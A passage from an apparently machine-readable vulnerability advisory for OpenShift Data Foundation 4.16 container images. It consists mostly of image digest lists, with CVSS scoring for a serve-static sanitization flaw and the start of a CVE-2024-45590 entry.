"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", 